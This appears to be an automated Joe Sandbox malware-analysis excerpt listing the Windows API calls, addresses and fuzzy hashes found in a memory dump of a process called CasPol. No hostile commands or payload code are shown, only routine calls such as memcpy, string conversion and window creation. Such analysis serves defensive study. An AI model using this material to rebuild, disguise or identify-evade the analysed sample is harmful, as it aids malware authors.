                                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                • memset.MSVCRT ref: 0041451A
                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                • String ID:
                                                                                                • API String ID: 1127616056-0
                                                                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                APIs
                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                • malloc.MSVCRT ref: 00417459
                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                • free.MSVCRT ref: 0041747F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                                • String ID:
                                                                                                • API String ID: 2605342592-0
                                                                                                • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2678498856-0
                                                                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                APIs
                                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                • String ID:
                                                                                                • API String ID: 764393265-0
                                                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                APIs
                                                                                                • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                • String ID:
                                                                                                • API String ID: 1386444988-0
                                                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                APIs
                                                                                                • _snwprintf.MSVCRT ref: 0040A398
                                                                                                • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _snwprintfmemcpy
                                                                                                • String ID: %2.2X
                                                                                                • API String ID: 2789212964-323797159
                                                                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                APIs
                                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                                • free.MSVCRT ref: 0040B201
                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                • free.MSVCRT ref: 0040B224
                                                                                                • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                • String ID:
                                                                                                • API String ID: 726966127-0
                                                                                                • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                APIs
                                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                                • free.MSVCRT ref: 0040B0FB
                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                • free.MSVCRT ref: 0040B12C
                                                                                                • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3669619086-0
                                                                                                • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                • malloc.MSVCRT ref: 00417407
                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                • free.MSVCRT ref: 00417425
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                                • String ID:
                                                                                                • API String ID: 2605342592-0
                                                                                                • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5